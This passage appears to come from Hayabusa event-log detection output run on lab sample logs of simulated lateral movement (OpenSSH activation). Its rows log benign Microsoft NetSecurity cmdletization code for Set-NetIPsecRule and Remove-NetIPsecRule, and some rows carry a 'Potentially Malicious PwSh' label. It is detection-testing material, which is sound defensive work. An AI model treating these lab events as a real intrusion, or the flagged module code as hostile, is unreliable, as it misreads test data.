$false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In';,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = 
${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in 
$InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] 
${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPh",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 